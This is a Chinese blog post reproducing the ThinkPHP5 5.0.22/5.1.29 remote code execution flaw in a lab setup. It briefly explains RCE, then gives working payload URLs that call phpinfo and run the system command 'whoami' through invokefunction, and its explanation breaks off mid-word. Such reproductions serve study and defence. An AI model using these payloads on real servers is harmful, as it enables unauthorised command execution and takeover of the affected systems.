Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现

远程代码执行漏洞作用:
攻击者向后台服务器远程注入操作系统命令或者代码,进而控制后台系统
远程代码执行漏洞的原理:
由于部分应用系统从设计上需要给用户提供指定的远程命令操作的接口,如果没有做严格的安全控制,可能会导致攻击者通过该接口提交恶意的命令,从而让后台进行执行,从而控制整个后台服务器。
由于需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。
启动环境,访问http://159.75.16.25:8087,看到启动界面

进行复现,poc:
/index.php?s=index//think/app/invokefunction&function=phpinfo&vars[0]=100
执行代码

 
执行whoami函数
index.php?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
invokefunction调用call_u

Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现最先出现在Python成神之路

版权声明:
作者:siwei
链接:https://www.techfm.club/p/27676.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>